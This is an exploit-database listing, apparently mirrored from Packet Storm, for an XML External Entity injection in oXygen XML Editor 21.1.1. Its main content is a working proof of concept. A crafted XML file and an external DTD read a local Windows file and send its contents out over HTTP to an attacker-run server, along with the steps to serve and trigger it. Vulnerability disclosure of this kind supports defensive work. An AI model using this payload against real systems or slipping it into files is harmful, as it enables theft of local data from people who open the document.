Lucene search
K

oXygen XML Editor 21.1.1 XML Injection

🗓️ 14 Nov 2019 00:00:00Reported by Pablo SantiagoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 216 Views

oXygen XML Editor 21.1.1 XML Injection, allows attackers to conduct XML External Entity Injectio

Code
`# Exploit Title: oXygen XML Editor 21.1.1 - XML External Entity Injection  
# Author: Pablo Santiago  
# Date: 2019-11-13  
# Vendor Homepage: https://www.oxygenxml.com/  
# Source:https://www.oxygenxml.com/xml_editor/download_oxygenxml_editor.html  
# Version: 21.1.1  
# CVE : N/A  
# Tested on: Windows 7  
  
#PoC  
  
1- python -m SimpleHTTPServer 8000  
1.1- Poc.xml :  
<?xml version="1.0"?>  
<!DOCTYPE test [  
<!ENTITY % file SYSTEM "C:\Windows\win.ini">  
<!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd">  
%dtd;]>  
<pwn>&send;</pwn>  
  
1.2.- payload.dtd  
<?xml version="1.0" encoding="UTF-8"?>  
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>">  
%all;  
2- File -> Open -> *.xml  
  
#PoC Visual  
https://imgur.com/2H8DhL9  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation